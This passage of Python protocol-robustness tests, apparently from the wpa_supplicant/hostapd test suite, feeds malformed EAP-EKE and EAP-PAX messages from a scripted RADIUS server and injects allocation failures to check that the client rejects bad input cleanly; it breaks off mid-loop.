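# EAP-EKE exchange codes as defined in RFC 6124. An EAP-EKE-ID/Request
# carries a 1-octet NumProposals, a reserved octet, NumProposals 4-octet
# proposals (Group, Encryption, PRF, MAC) and then a 1-octet IDType
# followed by the server identity.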
def test_eap_proto_eke(dev, apdev):
"""EAP-EKE protocol tests"""
def eke_handler(ctx, req):
logger.info("eke_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_EKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown exchange")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
2, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
4, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B4B",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 5 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
5, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0,
3, 1, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Failure/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_FAILURE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB4L8L5L5L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(eke_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 14):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def eap_eke_test_fail(dev, phase1=None, success=False):
dev.connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="eke user@domain", password="hello",
phase1=phase1, erp="1", wait_connect=False)
ev = dev.wait_event([ "CTRL-EVENT-EAP-FAILURE",
"CTRL-EVENT-EAP-SUCCESS" ], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
if not success and "CTRL-EVENT-EAP-FAILURE" not in ev:
raise Exception("EAP did not fail during failure test")
dev.request("REMOVE_NETWORK all")
dev.wait_disconnected()
def test_eap_proto_eke_errors(dev, apdev):
"""EAP-EKE local error cases"""
check_eap_capa(dev[0], "EKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_eke_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="eke user", password="hello",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_eke_dh_init", None),
(1, "eap_eke_prf_hmac_sha1", "dhgroup=3 encr=1 prf=1 mac=1"),
(1, "eap_eke_prf_hmac_sha256", "dhgroup=5 encr=1 prf=2 mac=2"),
(1, "eap_eke_prf", None),
(1, "os_get_random;eap_eke_dhcomp", None),
(1, "aes_128_cbc_encrypt;eap_eke_dhcomp", None),
(1, "aes_128_cbc_decrypt;eap_eke_shared_secret", None),
(1, "eap_eke_prf;eap_eke_shared_secret", None),
(1, "eap_eke_prfplus;eap_eke_derive_ke_ki", None),
(1, "eap_eke_prfplus;eap_eke_derive_ka", None),
(1, "eap_eke_prfplus;eap_eke_derive_msk", None),
(1, "os_get_random;eap_eke_prot", None),
(1, "aes_128_cbc_decrypt;eap_eke_decrypt_prot", None),
(1, "eap_eke_derive_key;eap_eke_process_commit", None),
(1, "eap_eke_dh_init;eap_eke_process_commit", None),
(1, "eap_eke_shared_secret;eap_eke_process_commit", None),
(1, "eap_eke_derive_ke_ki;eap_eke_process_commit", None),
(1, "eap_eke_dhcomp;eap_eke_process_commit", None),
(1, "os_get_random;eap_eke_process_commit", None),
(1, "os_get_random;=eap_eke_process_commit", None),
(1, "eap_eke_prot;eap_eke_process_commit", None),
(1, "eap_eke_decrypt_prot;eap_eke_process_confirm", None),
(1, "eap_eke_derive_ka;eap_eke_process_confirm", None),
(1, "eap_eke_auth;eap_eke_process_confirm", None),
(2, "eap_eke_auth;eap_eke_process_confirm", None),
(1, "eap_eke_prot;eap_eke_process_confirm", None),
(1, "eap_eke_derive_msk;eap_eke_process_confirm", None) ]
for count, func, phase1 in tests:
with fail_test(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1)
tests = [ (1, "=eap_eke_derive_ke_ki", None),
(1, "=eap_eke_derive_ka", None),
(1, "=eap_eke_derive_msk", None),
(1, "eap_eke_build_msg;eap_eke_process_id", None),
(1, "wpabuf_alloc;eap_eke_process_id", None),
(1, "=eap_eke_process_id", None),
(1, "wpabuf_alloc;=eap_eke_process_id", None),
(1, "wpabuf_alloc;eap_eke_process_id", None),
(1, "eap_eke_build_msg;eap_eke_process_commit", None),
(1, "wpabuf_resize;eap_eke_process_commit", None),
(1, "eap_eke_build_msg;eap_eke_process_confirm", None) ]
for count, func, phase1 in tests:
with alloc_fail(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1)
tests = [ (1, "eap_eke_getKey", None),
(1, "eap_eke_get_emsk", None),
(1, "eap_eke_get_session_id", None) ]
for count, func, phase1 in tests:
with alloc_fail(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1, success=True)
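# EAP-PAX (RFC 4746) constants: op-codes, flags, and the MAC, DH group,
# and public key cipher suite identifiers carried in the PAX header.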
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_MAC_HMAC_SHA256_128 = 0x02
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
"""EAP-PAX protocol tests"""
def pax_std_1(ctx):
logger.info("Test: STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
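# Handler pattern used throughout this file: the test RADIUS server calls
# the handler once per EAP response received from the station; ctx['num']
# counts calls across the whole test, and the idx ladder below replies to
# call N with the Nth scripted request.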
def pax_handler(ctx, req):
logger.info("pax_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Minimum length payload")
return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 16,
EAP_TYPE_PAX,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported MAC ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported DH Group ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
255, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported Public Key ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, 255,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: More fragments")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV in short frame")
return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 12,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - unsupported op_code")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - CE flag in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - too short STD-1 payload")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - incorrect A length in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - extra data in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 1 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
1,
0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-1")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MAC ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA256_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: DH Group ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_2048_MODP,
EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Public Key ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-3")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
# TODO: MAC calculation; for now, this gets dropped due to incorrect
# ICV
logger.info("Test: STD-3 with CE flag")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
idx += 1
if ctx['num'] & 0x1 == idx & 0x1:
logger.info("Test: Default request")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
else:
logger.info("Test: Default EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pax_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
logger.info("Waiting for EAP method to start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("No password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
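# The *_errors tests rely on the TEST_FAIL build hooks in wpa_supplicant:
# alloc_fail() arms an allocation failure at the Nth call whose backtrace
# matches the ';'-separated function pattern, and fail_test() does the
# same for explicit test-failure checkpoints.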
def test_eap_proto_pax_errors(dev, apdev):
"""EAP-PAX local error cases"""
check_eap_capa(dev[0], "PAX")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_pax_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_1",
"eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_3",
"eap_pax_getKey",
"eap_pax_get_emsk",
"eap_pax_get_session_id" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_pax_process_std_1"),
(1, "eap_pax_initial_key_derivation"),
(1, "eap_pax_mac;eap_pax_process_std_3"),
(2, "eap_pax_mac;eap_pax_process_std_3"),
(1, "eap_pax_kdf;eap_pax_getKey"),
(1, "eap_pax_kdf;eap_pax_get_emsk") ]
for count, func in tests:
